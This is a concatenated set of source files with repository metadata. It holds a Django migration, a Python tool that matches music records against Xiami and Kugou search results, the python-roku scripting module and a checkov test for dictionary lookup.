TABLE_SPEC[destination_table]["delta_table_create_sql"].format(
DESTINATION_TABLE=destination_table_name,
DESTINATION_DATABASE=destination_database,
SPARK_S3_BUCKET=spark_s3_bucket,
DELTA_LAKE_S3_PATH=CONFIG.DELTA_LAKE_S3_PATH,
)
)
if spark_created_by_command:
spark.stop()
|
285c6213753cb3cf9c30bdbb023cb7669561bcca
|
61b1380f8e6cc00a2dcab0280deff8c18c4812c2
|
/pydis_site/apps/api/migrations/0084_infraction_last_applied.py
|
7704ddb821864f734879dcacd41d436cd1dfd7bc
|
[
"MIT"
] |
permissive
|
python-discord/site
|
969ada9c7d70edeaadb781e630c8896b4a207f90
|
cb6326cabee6570a5725702cb2893ae39f752279
|
refs/heads/main
| 2023-09-04T07:17:58.116382
| 2023-08-31T14:20:38
| 2023-08-31T14:20:38
| 120,370,405
| 746
| 224
|
MIT
| 2023-09-14T10:23:08
| 2018-02-05T22:31:04
|
Python
|
UTF-8
|
Python
| false
| false
| 816
|
py
|
0084_infraction_last_applied.py
|
# Generated by Django 4.0.6 on 2022-07-27 20:32
import django.utils.timezone
from django.db import migrations, models
from django.apps.registry import Apps
def set_last_applied_to_inserted_at(apps: Apps, schema_editor):
Infractions = apps.get_model("api", "infraction")
Infractions.objects.all().update(last_applied=models.F("inserted_at"))
class Migration(migrations.Migration):
dependencies = [
('api', '0083_remove_embed_validation'),
]
operations = [
migrations.AddField(
model_name='infraction',
name='last_applied',
field=models.DateTimeField(default=django.utils.timezone.now, help_text='The date and time of when this infraction was last applied.'),
),
migrations.RunPython(set_last_applied_to_inserted_at)
]
|
ffa9d6f4fb4eb7180e84e4285090be2789f51d3a
|
4d44674625100e62be2bb5033339fb641bd454ac
|
/snippet/example/python/check_music.py
|
fd3572bb2ddc9c0d535058b428d522488f956308
|
[
"MIT"
] |
permissive
|
xgfone/snippet
|
8b9004a649d2575b493a376c4b4f3d4a7c56a4b0
|
b0b734dd35478b7ef3e6193623981f4f29b6748c
|
refs/heads/master
| 2022-03-18T12:41:09.033144
| 2022-02-20T15:26:35
| 2022-02-20T15:26:35
| 41,615,643
| 158
| 61
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 36,520
|
py
|
check_music.py
|
#!/usr/bin/env python3
# -*- coding: utf8 -*-
#
# Support Python 3.6+
#
# Install:
# $ pip3 install six gevent requests sqlalchemy pymysql requests_html openpyxl
#
# Run:
# $ python check_music.py -h
#
import gevent.pool
import gevent.monkey
gevent.monkey.patch_all(Event=True, sys=True)
taskpool = gevent.pool.Pool(size=1000)
spawn = taskpool.spawn
import sys
import logging
import traceback
PY3, Unicode, Bytes = True, str, bytes
LOG = logging.getLogger()
def to_bytes(v, encoding="utf-8", **kwargs):
if isinstance(v, Bytes):
return v
elif isinstance(v, Unicode):
return v.encode(encoding)
return to_bytes(str(v), encoding=encoding)
def to_unicode(v, encoding="utf-8", **kwargs):
if isinstance(v, Bytes):
return v.decode(encoding)
elif isinstance(v, Unicode):
return v
return to_unicode(str(v), encoding=encoding)
to_str = to_unicode if PY3 else to_bytes
is_bytes = lambda s: isinstance(s, Bytes)
is_unicode = lambda s: isinstance(s, Unicode)
is_string = lambda s: isinstance(s, (Bytes, Unicode))
def init_logging(logger, level, log_file=None):
fmt = "%(asctime)s - %(pathname)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s"
datefmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(fmt=fmt, datefmt=datefmt)
level = getattr(logging, level.upper())
logger.setLevel(level)
if log_file:
from logging.handlers import TimedRotatingFileHandler
handler = TimedRotatingFileHandler(log_file, when="midnight", interval=1, backupCount=30)
else:
handler = logging.StreamHandler()
handler.setLevel(level)
handler.setFormatter(formatter)
logger.addHandler(handler)
##############################################################################
# Configuration
from argparse import ArgumentParser
# @Author: xgfone
# @Email: xgfone@126.com
class Configuration(object):
class Group(object):
def __init__(self, group_name):
self.__name = group_name
def __repr__(self):
attrs = []
for key, value in vars(self).items():
if key != "_Group__name":
attrs.append("{0}={1}".format(key, value))
return "{0}({1})".format(self.__class__.__name__, ", ".join(attrs))
def __contains__(self, name):
return hasattr(self, name)
def __getattr__(self, name):
e = "The group '{0}' has no the option '{1}'"
raise AttributeError(e.format(self.__name, name))
def __setitem__(self, name, value):
setattr(self, name, value)
def __getitem__(self, name):
try:
return getattr(self, name)
except AttributeError:
e = "The group '{0}' has no the option '{1}'"
raise KeyError(e.format(self.__name, name))
def items(self):
d = vars(self)
d.pop("_Group__name")
return d.items()
__slots__ = ["_default_group_name", "_default_group", "_allow_empty",
"_encoding", "_parsed", "_caches", "_opts", "_bool_true",
"_bool_false", "_py2", "_description", "_version"]
def __init__(self, description=None, allow_empty=False, encoding="utf-8",
default_group="DEFAULT", version=None):
"""A simple configuration file parser based on the format INI.
When an configuration option does not exist, for getting one default
value, not raising an exception, please use the method of get(), or the
builtin function of getattr().
"""
self._parsed = False
self._description = description
self._default_group_name = default_group
self._default_group = Configuration.Group(self._default_group_name)
self._allow_empty = allow_empty
self._encoding = encoding
self._version = version if version else "Unknown"
self._caches = {self._default_group_name: self._default_group}
self._opts = {}
self._bool_true = ["t", "1", "on", "true"]
self._bool_false = ["f", "0", "off", "false"]
try:
"".decode()
except AttributeError:
self._py2 = False
else:
self._py2 = True
def __getattr__(self, name):
if not self._parsed:
raise Exception("Not parsed")
try:
return self._caches[name]
except KeyError:
pass
msg = "'{0}' object has no attribute '{1}'"
raise AttributeError(msg.format(self.__class__.__name__, name))
def __getitem__(self, name):
if not self._parsed:
raise Exception("Not parsed")
_name = self._uniformize(name)
try:
return self._caches[_name]
except KeyError:
pass
msg = "'{0}' has no key '{1}'"
raise KeyError(msg.format(self.__class__.__name__, name))
def __repr__(self):
attrs = []
for key, value in self._caches.items():
attrs.append("{0}={1}".format(key, value))
return "{0}({1})".format(self.__class__.__name__, ", ".join(attrs))
def _set_group_opt(self, group_name, opt_name, opt_value, force=False):
gname = group_name if group_name else self._default_group_name
group = self._caches[gname]
if hasattr(group, opt_name) and not force:
e = "The group '{0}' has had the option of '{1}'"
raise ValueError(e.format(gname, opt_name))
setattr(self._caches[gname], opt_name, opt_value)
def _register(self, name, parser, default=None, group=None, help=None, short=None):
if self._parsed:
raise Exception("Have been parsed")
name = self._uniformize(name)
group = self._uniformize(group if group else self._default_group_name)
self._opts.setdefault(group, {})
if name in self._opts[group]:
raise KeyError("The option {0} has been regisetered".format(name))
self._opts[group][name] = (parser, default, help, short)
self._caches.setdefault(group, Configuration.Group(group))
def _parse_int(self, value):
return int(value)
def _parse_float(self, value):
return float(value)
def _parse_bool(self, value):
if isinstance(value, bool):
return value
elif not is_string(value):
return bool(value)
value = value.lower()
if value in self._bool_true:
return True
elif value in self._bool_false:
return False
raise ValueError("invalid bool value '{0}'".format(value))
def _parse_string(self, value):
if self._py2:
if isinstance(value, str):
return value.decode(self._encoding)
else:
if not isinstance(value, str):
return value.decode(self._encoding)
return value
def _parse_ints(self, value):
return self._parse_list(self._parse_int, value)
def _parse_strings(self, value):
return self._parse_list(self._parse_string, value)
def _parse_list(self, parser, value):
if isinstance(value, (list, tuple)):
vs = value
else:
vs = (v.strip() for v in value.split(",") if v.strip())
return tuple((parser(v) for v in vs))
def _uniformize(self, name):
return name.replace("-", "_")
def _unniformize(self, name):
return name.replace("_", "-")
def parsed(self):
"""Return True if it has been parsed, or False."""
return self._parsed
def parse_files(self, filenames=""):
"""Parse the INI configuration files.
The argument is either a string standing for the path of the
configuration file, or a list of them.
"""
if self._parsed:
raise Exception("Have been parsed")
self._parsed = True
if filenames:
if not isinstance(filenames, (list, tuple)):
filenames = self._parse_string(filenames).strip(", ").split(",")
for filename in filenames:
self._parse_file(filename)
self._check_and_fix()
def _check_and_fix(self):
for gname, opts in self._opts.items():
group = self._caches[gname]
for name, opt in opts.items():
if name in group:
continue
elif opt[1] is not None or opt[0] == self._parse_bool:
self._set_group_opt(gname, name, opt[1])
continue
if not self._allow_empty:
msg = "The option '{0}' in the group '{1}' has no value."
raise ValueError(msg.format(name, gname))
# Set the options in the default group into self.
group = self._caches.pop(self._default_group_name)
for key, value in group.items():
if key in self._caches:
msg = "'{0}' had has the value '{1}'"
raise ValueError(msg.format(self.__class__.__name__, key))
self._caches[key] = value
def _parse_file(self, filename):
filename = str(filename)
with open(filename) as f:
lines = f.readlines()
gname = self._default_group_name
index, max_index = 0, len(lines)
while index < max_index:
line = self._parse_string(lines[index]).strip()
index += 1
# Comment
if not line or line[0] in ("#", "=", ";"):
continue
# Group Section
if line[0] == "[":
if line[-1] != "]":
m = ("the format of the group is wrong, "
"which must start with [ and end with ]")
raise ValueError(m)
_gname = line[1:-1]
if not _gname:
raise ValueError("the group name is empty")
if _gname not in self._caches:
continue
gname = _gname
continue
# Group Option Values
items = line.split("=", 1)
if len(items) != 2:
raise ValueError("the format is wrong, must contain '=': " + line)
name, value = self._uniformize(items[0].strip()), items[1].strip()
# Handle the continuation line
if value[-1:] == "\\":
values = [value.rstrip("\\").strip()]
while index < max_index:
value = lines[index].strip()
values.append(value.rstrip("\\").strip())
index += 1
if value[-1:] != "\\":
break
value = "\n".join(values)
opt = self._opts[gname].get(name, None)
if opt:
self._set_group_opt(gname, name, opt[0](value))
def register_bool(self, name, short=None, default=None, group=None, help=None):
"""Register the bool option.
The value of this option will be parsed to the type of bool.
"""
self._register(name, self._parse_bool, short=short, default=default,
group=group, help=help)
def register_int(self, name, short=None, default=None, group=None, help=None):
"""Register the int option.
The value of this option will be parsed to the type of int.
"""
self._register(name, self._parse_int, short=short, default=default,
group=group, help=help)
def register_float(self, name, short=None, default=None, group=None, help=None):
"""Register the float option.
The value of this option will be parsed to the type of float.
"""
self._register(name, self._parse_float, short=short, default=default,
group=group, help=help)
def register_str(self, name, short=None, default=None, group=None, help=None):
"""Register the str option.
The value of this option will be parsed to the type of str.
"""
self._register(name, self._parse_string, short=short, default=default,
group=group, help=help)
def register_int_list(self, name, short=None, default=None, group=None, help=None):
"""Register the int list option.
The value of this option will be parsed to the type of int list.
"""
self._register(name, self._parse_ints, short=short, default=default,
group=group, help=help)
def register_str_list(self, name, short=None, default=None, group=None, help=None):
"""Register the string list option.
The value of this option will be parsed to the type of string list.
"""
self._register(name, self._parse_strings, short=short, default=default,
group=group, help=help)
###########################################################################
# Parse CLI
def parse(self, *args, **kwargs):
return self.parse_cli(*args, **kwargs)
def parse_cli(self, args=None, config_file_name="config-file"):
"""Parse the cli options."""
if self._parsed:
raise Exception("Have been parsed")
self._parsed = True
if args is None:
args = sys.argv[1:]
if not args:
self._check_and_fix()
return None
gopts, args = self._parser_cli(args, description=self._description,
config_file_name=config_file_name)
if getattr(args, "version", False):
print(self._version)
sys.exit(0)
if config_file_name:
config_file = getattr(args, self._uniformize(config_file_name), "")
for filename in config_file.split(","):
filename = filename.strip()
if filename:
self._parse_file(filename)
for cli_opt, (gname, name) in gopts.items():
opt = self._opts[gname][name]
value = getattr(args, cli_opt, None)
if value is not None:
value = opt[0](value)
if value != opt[1]:
self._set_group_opt(gname, name, value, force=True)
self._check_and_fix()
return args
def _parser_cli(self, args, description=None, config_file_name=None):
cli = ArgumentParser(description=description)
if config_file_name:
cli.add_argument("--" + config_file_name, default="",
help="The config file path.")
cli.add_argument("--version", action="store_true",
help="Print the version and exit.")
group_opts = {}
for gname, opts in self._opts.items():
if gname == self._default_group_name:
group = cli
else:
group = cli.add_argument_group(gname)
for name, (parser, default, help, short) in opts.items():
action = None
if parser == self._parse_bool:
action = "store_false" if default else "store_true"
default = False if default is None else default
if gname == self._default_group_name:
opt_name = self._unniformize(name)
opt_key = self._uniformize(name)
else:
opt_name = self._unniformize("{0}-{1}".format(gname, name))
opt_key = self._uniformize(opt_name)
group_opts[opt_key] = (gname, name)
short = "-" + short if short and short[0] != "-" else short
names = [short, "--" + opt_name] if short else ["--" + opt_name]
group.add_argument(*names, action=action, default=default, help=help)
return group_opts, cli.parse_args(args=args)
# Configuration End
###############################################################################
###############################################################################
# Common
import requests
from urllib.parse import quote as qs_quote
def send_http_get(url, quote=True, use_key=False, co="?", timeout=5,
raise404=True, has_result=True, **ks):
if ks:
to = lambda v: qs_quote(to_str(v)) if quote else v
ks = {k: to(v() if callable(v) else v) for k, v in ks.items() if v is not None}
if use_key:
url = co.join((url, "&".join(("%s=%s" % (k, v) for k, v in ks.items()))))
else:
url = url.format(**ks)
resp = requests.get(url, timeout=timeout)
status_code = resp.status_code
if status_code == 404:
if raise404:
raise Exception("not found %s" % url)
return None
elif status_code == 200:
if has_result:
return resp.json()
return None
elif status_code == 204:
return None
raise OSError("%s: status_code=%s" % (url, status_code))
# Common End
###############################################################################
###############################################################################
# DB Common
from sqlalchemy import create_engine, text
from sqlalchemy.orm import sessionmaker, object_mapper
from sqlalchemy.sql.elements import TextClause
Iterator = object
class DB(object):
"""Manager the DB connection."""
def __init__(self, write_connection, read_connection=None, autocommit=True,
expire_on_commit=False, echo=False, encoding=str("utf8"),
poolclass=None, pool=None, min_pool_size=2, max_pool_size=5,
pool_timeout=30, idle_timeout=3600):
write_connection = self._fix_charset(write_connection, encoding)
if read_connection:
read_connection = self._fix_charset(read_connection, encoding)
kwargs = {
"echo": echo,
"encoding": encoding,
"poolclass": poolclass,
"pool": pool,
"pool_size": min_pool_size,
"pool_timeout": pool_timeout if pool_timeout else None,
"pool_recycle": idle_timeout,
"max_overflow": max_pool_size - min_pool_size,
"convert_unicode": True,
}
self._autocommit = autocommit
self._expire_on_commit = expire_on_commit
self._write_engine = self._create_engine(write_connection, kwargs)
self._write_session_cls = self._get_session_cls(self._write_engine)
if read_connection:
self._read_engine = self._create_engine(read_connection, kwargs)
self._read_session_cls = self._get_session_cls(self._read_engine)
else:
self._read_engine = self._write_engine
self._read_session_cls = self._write_session_cls
def _fix_charset(self, connection, encoding):
if "mysql" in connection and "charset=" not in connection:
if "?" in connection:
return "%s&charset=%s" % (connection, encoding)
return "%s?charset=%s" % (connection, encoding)
return connection
def _create_engine(self, connection, kwargs):
if connection.startswith("sqlite:///"):
kwargs.pop("pool_size", None)
kwargs.pop("pool_timeout", None)
kwargs.pop("max_overflow", None)
return create_engine(connection, **kwargs)
def _get_session_cls(self, engine):
return sessionmaker(bind=engine, autocommit=self._autocommit,
expire_on_commit=self._expire_on_commit)
def get_write_session(self):
return self._write_session_cls()
def get_read_session(self):
return self._read_session_cls()
def get_session(self):
return self.get_write_session()
def execute(self, sql, session=None, **kwargs):
if not isinstance(sql, TextClause):
sql = text(sql)
return (session or self.get_session()).execute(sql, kwargs)
def fetchall(self, sql, **kwargs):
return self.execute(sql, self.get_read_session(), **kwargs).fetchall()
def fetchone(self, sql, **kwargs):
return self.execute(sql, self.get_read_session(), **kwargs).fetchone()
def first(self, sql, **kwargs):
return self.execute(sql, self.get_read_session(), **kwargs).first()
class ModelBase(Iterator):
"""Base class for models."""
__tablename__ = ""
__table_initialized__ = False
def save(self, session):
"""Save this object."""
# NOTE(boris-42): This part of code should be look like:
# session.add(self)
# session.flush()
# But there is a bug in sqlalchemy and eventlet that
# raises NoneType exception if there is no running
# transaction and rollback is called. As long as
# sqlalchemy has this bug we have to create transaction
# explicitly.
with session.begin(subtransactions=True):
session.add(self)
session.flush()
def __repr__(self):
attrs = ", ".join(("%s=%s" % (k, v) for k, v in self.items()))
return "%s(%s)" % (self.__tablename__.title(), attrs)
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def __contains__(self, key):
# Don't use hasattr() because hasattr() catches any exception, not only
# AttributeError. We want to passthrough SQLAlchemy exceptions
# (ex: sqlalchemy.orm.exc.DetachedInstanceError).
try:
getattr(self, key)
except AttributeError:
return False
else:
return True
def get(self, key, default=None):
return getattr(self, key, default)
def __iter__(self):
columns = list(dict(object_mapper(self).columns).keys())
return ModelIterator(self, iter(columns))
def update(self, values):
"""Make the model object behave like a dict."""
for k, v in values.items():
setattr(self, k, v)
def _as_dict(self):
"""Make the model object behave like a dict.
Includes attributes from joins.
"""
local = dict((key, value) for key, value in self)
joined = dict([(k, v) for k, v in self.__dict__.items() if not k[0] == '_'])
local.update(joined)
return local
def items(self):
"""Make the model object behave like a dict."""
return self._as_dict().items()
def keys(self):
"""Make the model object behave like a dict."""
return [key for key, value in self.items()]
class ModelIterator(Iterator):
def __init__(self, model, columns):
self.model = model
self.i = columns
def __iter__(self):
return self
# In Python 3, __next__() has replaced next().
def __next__(self):
n = next(self.i)
return n, getattr(self.model, n)
# DB Common End
###############################################################################
###############################################################################
# DB
from datetime import datetime
from sqlalchemy import Column, String, Boolean, Integer, DateTime
from sqlalchemy.sql import func, expression as expr
from sqlalchemy.ext.declarative import declarative_base
BASE = declarative_base()
class MusicBase(ModelBase):
id = Column(Integer, primary_key=True)
sid = Column(String(16), nullable=False)
name = Column(String(128), nullable=False)
singer = Column(String(128), nullable=False)
ablum = Column(String(128), nullable=False)
url = Column(String(128), nullable=False, server_default="")
check = Column(Boolean, nullable=False, index=True, server_default=expr.text("0"))
update_time = Column(DateTime, nullable=False, server_default=func.now())
class Music0(MusicBase, BASE):
__tablename__ = "music0"
class Music1(MusicBase, BASE):
__tablename__ = "music1"
class Music2(MusicBase, BASE):
__tablename__ = "music2"
class Music3(MusicBase, BASE):
__tablename__ = "music3"
class Music4(MusicBase, BASE):
__tablename__ = "music4"
class Music5(MusicBase, BASE):
__tablename__ = "music5"
class Music6(MusicBase, BASE):
__tablename__ = "music6"
class Music7(MusicBase, BASE):
__tablename__ = "music7"
class Music8(MusicBase, BASE):
__tablename__ = "music8"
class Music9(MusicBase, BASE):
__tablename__ = "music9"
class Music10(MusicBase, BASE):
__tablename__ = "music10"
class Music11(MusicBase, BASE):
__tablename__ = "music11"
class Music12(MusicBase, BASE):
__tablename__ = "music12"
class Music13(MusicBase, BASE):
__tablename__ = "music13"
class Music14(MusicBase, BASE):
__tablename__ = "music14"
class Music15(MusicBase, BASE):
__tablename__ = "music15"
class Music16(MusicBase, BASE):
__tablename__ = "music16"
class Music17(MusicBase, BASE):
__tablename__ = "music17"
class Music18(MusicBase, BASE):
__tablename__ = "music18"
class Music19(MusicBase, BASE):
__tablename__ = "music19"
class Music20(MusicBase, BASE):
__tablename__ = "music20"
MusicModels = {
"0": Music0,
"1": Music1,
"2": Music2,
"3": Music3,
"4": Music4,
"5": Music5,
"6": Music6,
"7": Music7,
"8": Music8,
"9": Music9,
"10": Music10,
"11": Music11,
"12": Music12,
"13": Music13,
"14": Music14,
"15": Music15,
"16": Music16,
"17": Music17,
"18": Music18,
"19": Music19,
"20": Music20,
}
class DBAPI(DB):
def __init__(self, db_no, *args, **kwargs):
super(DBAPI, self).__init__(*args, **kwargs)
self._db_no = str(db_no)
self._model = self._get_model(self._db_no)
def create_tables(self):
BASE.metadata.create_all(self._write_engine)
def _get_model(self, sid):
return MusicModels[sid[-1]]
def get_unchecked_musics(self, num=1000):
s = self.get_session()
return s.query(self._model).filter_by(check=False).limit(num).all()
def get_checked_musics(self):
s = self.get_session()
return s.query(self._model).filter_by(check=True).filter(self._model.url != "").all()
def add_music(self, num, sid, name, singer, ablum, use_sid=False):
m = self._get_model(sid[-1] if use_sid else str(num))
m(sid=sid, name=name, singer=singer, ablum=ablum).save(self.get_session())
def set_url(self, id, url):
ks = {"update_time": datetime.now(), "check": True, "url": url}
self.get_session().query(self._model).filter_by(id=id).update(ks)
# DB End
###############################################################################
import json
import os.path
from requests import ConnectionError, Timeout
from requests_html import HTMLSession
_SITES = {}
def register(name, *args, **kwargs):
def decorate(cls):
if name in _SITES:
raise ValueError("The site '%s' has been registered" % name)
_SITES[name] = cls(*args, **kwargs)
return cls
return decorate
def import_xlsx_into_db(dbapi, xlsx_path, columns=(0, 1, 2, 3), table_num=0):
from openpyxl import load_workbook
if not os.path.exists(xlsx_path):
raise RuntimeError("The Excel file '%s' does not exist" % xlsx_path)
def _import(i, num, id, name, ablum, singer):
id = str(id.value)
name = str(name.value)
ablum = str(ablum.value)
singer = str(singer.value)
if id and name and ablum and singer:
try:
dbapi.add_music(num, id, name, singer, ablum, use_sid=not table_num)
except Exception as err:
LOG.error(err)
LOG.debug("import row %s", i)
ts = []
num = 0
id_i, name_i, ablum_i, singer_i = columns
ws = load_workbook(xlsx_path).active
for i, r in enumerate(ws.rows, 1):
t = spawn(_import, i, num, r[id_i], r[name_i], r[ablum_i], r[singer_i])
ts.append(t)
num += 1
if num >= table_num:
num = 0
for t in ts:
t.join()
def export_to_excel(dbapi, xlsx_path):
from openpyxl import Workbook
if os.path.exists(xlsx_path):
raise RuntimeError("The Excel file '%s' has existed" % xlsx_path)
wb = Workbook()
ws = wb.active
ws["A1"] = "SID"
ws["B1"] = "Song Name"
ws["C1"] = "Album Name"
ws["D1"] = "Singer Name"
ws["E1"] = "URL"
for i, m in enumerate(dbapi.get_checked_musics(), 2):
ws["A%s" % i] = m.sid
ws["B%s" % i] = m.name
ws["C%s" % i] = m.ablum
ws["D%s" % i] = m.singer
ws["E%s" % i] = m.url
wb.save(xlsx_path)
def get_site(name):
site = _SITES.get(name, None)
if not site:
raise ValueError("no support the site '%s'" % name)
return site
def refactor_str(s):
return ' '.join(s.lower().strip().split()).replace("'", "")
def refactor_ablum_name(s):
return refactor_str(s.strip().lstrip("\u300a").rstrip("\u300b"))
def check_music(site_handler, dbapi, m, equal_test=False):
try:
infos = site_handler(m.name)
except (ConnectionError, Timeout) as err:
LOG.info("Timeout: sid=%s, name=%s, singer=%s, ablum=%s, err=%s",
m.sid, m.name, m.singer, m.ablum, err)
return
url = ""
for info in infos:
url = _check_music(info, m.name, m.singer, m.ablum, equal_test)
if url:
break
try:
dbapi.set_url(m.id, url)
except Exception as err:
LOG.error("Failed to set url: %s", err)
if not infos:
LOG.warning("NotFound: sid=%s, name=%s, singer=%s, ablum=%s",
m.sid, m.name, m.singer, m.ablum)
return
def _check_music(info, song, singer, ablum, equal_test=False):
song = refactor_str(song)
singer = refactor_str(singer)
ablum = refactor_ablum_name(ablum)
if equal_test:
if info["SongName"] != song:
return ""
if singer and info["SingerName"] != singer:
return ""
if ablum and info["AlbumName"] != ablum:
return ""
else:
if singer and singer not in info["SingerName"]:
return ""
if ablum and ablum not in info["AlbumName"]:
return ""
return info["FileURL"]
def handle_musics(dbapi, site_handler, equal_test=False, num=1000, each=10):
while True:
musics = dbapi.get_unchecked_musics(num=num)
if not musics:
return
while musics:
ms = musics[:each]
musics = musics[each:]
tasks = []
for m in ms:
tasks.append(spawn(check_music, site_handler, dbapi, m, equal_test))
for t in tasks:
t.join()
@register("xiami")
class XiaMi:
SEARCH_URL = "http://www.xiami.com/search?key="
FILE_URL = ("http://www.xiami.com/play?ids=/song/playlist/id/{id}"
"/object_name/default/object_id/0")
def __init__(self):
self._session = HTMLSession()
def __call__(self, keyword):
url = self.SEARCH_URL + qs_quote(keyword)
html = self._session.get(url).html
trs = html.find(".search_result_box .track_list tr")
if not trs:
return []
results = []
for tr in trs:
tds = tr.find("td")
if len(tds) < 5:
continue
a = tds[4].find("a", first=True)
if not a:
continue
if a.attrs.get("title", "").strip() != "\u8bd5\u542c":
continue
onclick = a.attrs["onclick"].split("'")
if len(onclick) < 2:
continue
id = onclick[1].strip()
if not id:
continue
results.append({
"FileURL": self.FILE_URL.format(id=id),
"SongName": refactor_str(tds[1].text),
"SingerName": refactor_str(tds[2].text),
"AlbumName": refactor_ablum_name(tds[3].text),
})
return results
@register("kugou")
class KuGou:
CALLBACK_KEY = "jQuery112406206328947895503"
CALLBACK_LEN = len(CALLBACK_KEY) + 1
FILE_URL = "http://www.kugou.com/song/#hash={hash}&album_id={album_id}"
SEARCH_URL = ("http://songsearch.kugou.com/song_search_v2?callback={cb}&"
"page={page}&pagesize={size}&userid={userid}&keyword=")
def __init__(self, page=1, page_size=30, userid=-1):
self._url = self.SEARCH_URL.format(cb=self.CALLBACK_KEY, page=page,
size=page_size, userid=userid)
def _get_url(self, hash, album_id=""):
return self.FILE_URL.format(hash=hash, album_id=album_id) if hash else ""
def __call__(self, keyword):
url = self._url + qs_quote(keyword)
data = send_http_get(url, json=False)
if not data:
return None
data = data[self.CALLBACK_LEN:-2]
if not data:
return None
d = json.loads(data)
if d["status"] != 1 or d["error_code"] != 0:
msg = "The response error: status=%s, error_code=%s"
raise ValueError(msg % (d["status"], d["error_code"]))
results = []
for m in d["data"]["lists"]:
file1 = m.get("FileHash", None)
file2 = m.get("HQFileHash", None)
if not file1 and not file2:
continue
albumid = m.get("AlbumID", "")
url = self._get_url(file1, albumid) or self._get_url(file2, albumid)
m["FileURL"] = url
m["AlbumName"] = refactor_ablum_name(m.get("AlbumName", ""))
m["SongName"] = refactor_str(m["SongName"])
m["SingerName"] = refactor_str(m["SingerName"])
results.append(m)
return results
def main(version="1.0.0"):
conf = Configuration(description="Check the music.", version=version)
conf.register_str("log_level", default="INFO",
help="The level of the log, such as debug, info, etc.")
conf.register_str("log_file", default="", help="The file path of the log.")
conf.register_bool("print_sql", help="Print the SQL statements.")
conf.register_int("thread_num", default=0, help="The size of the coroutine pool.")
conf.register_str("site", default="xiami", help="The site name, such as xiami.")
conf.register_bool("equal_test", help="Check the music by the equal.")
conf.register_int("db_no", default=0, help="The DB index number.")
conf.register_int("db_pool_size", default=20, help="The max number of db conn pool.")
conf.register_int("db_pool_timeout", default=30, help="The timeout of pool.")
conf.register_str("db_conn", help="MySQL connection to query the music data.",
default="sqlite:///music.db")
conf.register_bool("db_create", help="Initialize the Database.")
conf.register_str("export_xlsx", default="", help="Export the result into a Excel file.")
conf.register_str("import_xlsx", default="", help="Import the musics from Excel to DB.")
conf.register_int("split_num", default=0, help="The number of the DB tables to split.")
conf.register_int_list("xlsx_cols", default=(0, 1, 2, 3),
help="The index no of id, song name, ablum name, singer.")
conf.parse()
if conf.thread_num > 0:
global taskpool, spawn
taskpool = gevent.pool.Pool(size=conf.thread_num)
spawn = taskpool.spawn
timeout = None if conf.db_create else conf.db_pool_timeout
init_logging(LOG, conf.log_level, conf.log_file)
dbapi = DBAPI(conf.db_no, conf.db_conn, max_pool_size=conf.db_pool_size,
pool_timeout=timeout, idle_timeout=300, echo=conf.print_sql)
if conf.db_create:
dbapi.create_tables()
return
if conf.import_xlsx:
import_xlsx_into_db(dbapi, conf.import_xlsx, conf.xlsx_cols, conf.split_num)
return
if conf.export_xlsx:
export_to_excel(dbapi, conf.export_xlsx)
return
try:
handle_musics(dbapi, get_site(conf.site), conf.equal_test)
except Exception:
LOG.error(traceback.format_exc())
if __name__ == "__main__":
main()
|
cd833d2493eeea9eeedea143ef1778817f442218
|
3829c6e0381216e19fec68f34eb8ef327c6989f4
|
/roku/scripting.py
|
0f65c609fcf2dd8826ee868e81cbfeb7bab38efe
|
[] |
permissive
|
jcarbaugh/python-roku
|
f9d8553ba4c1d4999dbcb4c4173b1a117ef5d512
|
b88125abca91573f4882d1265a38490a4bbff8ba
|
refs/heads/main
| 2023-08-04T08:31:43.725487
| 2023-04-22T00:13:09
| 2023-04-22T00:13:09
| 15,637,861
| 253
| 97
|
BSD-3-Clause
| 2023-07-25T21:37:57
| 2014-01-04T19:09:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,418
|
py
|
scripting.py
|
import logging
import os
import re
import time
from collections import namedtuple
SCRIPT_RE = re.compile(
r"(?P<command>\w+)(?:\:(?P<param>[\w\s]+))?(?:\@(?P<count>\d+))?(?:\*(?P<sleep>[\d\.]+))?"
) # noqa
Command = namedtuple("Command", ["command", "param", "count", "sleep"])
logger = logging.getLogger("roku.scripting")
def load_script(path, params=None, raw=False):
if not os.path.exists(path):
raise ValueError(f"script at {path} not found")
with open(path) as infile:
content = infile.read()
if params:
content = content.format(**params)
if not raw:
content = content.strip().split("\n")
return content
def parse_script(script):
commands = []
for line in script:
if not line:
continue
m = SCRIPT_RE.match(line)
if m:
data = m.groupdict()
data["count"] = int(data["count"] or 1)
data["sleep"] = float(data["sleep"]) if data["sleep"] else None
commands.append(Command(**data))
return commands
def run_script(roku, script, sleep=0.5):
for cmd in script:
logger.debug(cmd)
for i in range(cmd.count or 1):
func = getattr(roku, cmd.command)
if func:
if cmd.param:
func(cmd.param)
else:
func()
time.sleep(cmd.sleep or sleep)
|
d8366688808b2dc2923ddf93355affa9134e97f5
|
45e376ae66b78b17788b1d3575b334b2cb1d0b1c
|
/tests/common/utils/test_data_structures_utils.py
|
42f4fe0657f2d327976b6668bb97a29a4fc082be
|
[
"Apache-2.0"
] |
permissive
|
bridgecrewio/checkov
|
aeb8febed2ed90e61d5755f8f9d80b125362644d
|
e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d
|
refs/heads/main
| 2023-08-31T06:57:21.990147
| 2023-08-30T23:01:47
| 2023-08-30T23:01:47
| 224,386,599
| 5,929
| 1,056
|
Apache-2.0
| 2023-09-14T20:10:23
| 2019-11-27T08:55:14
|
Python
|
UTF-8
|
Python
| false
| false
| 950
|
py
|
test_data_structures_utils.py
|
from typing import Any
import pytest
from checkov.common.util.data_structures_utils import find_in_dict
@pytest.mark.parametrize(
"key_path,expected_value",
[
("key_99", None),
("key_1/key_2/key_3", None),
("key_1/key_2/[10]/key_3", None),
("key_1/key_5", "string"),
("key_1/key_2/[0]/key_3", 1),
("key_1/key_2/[1]/key_4", True),
],
ids=["key_not_exists", "nested_key_not_exists", "index_not_exists", "key", "index", "index_1"],
)
def test_find_in_dict(key_path: str, expected_value: Any) -> None:
input_dict = {
"key_1": {
"key_2": [
{
"key_3": 1,
},
{
"key_4": True,
},
],
"key_5": "string",
}
}
# when
actual_value = find_in_dict(input_dict, key_path)
# then
assert actual_value == expected_value
|
c3776267123af76cecad9972a40b946eb6512b8a
|
b06340ae3dfcb551bacefa362c034b064809fd28
|
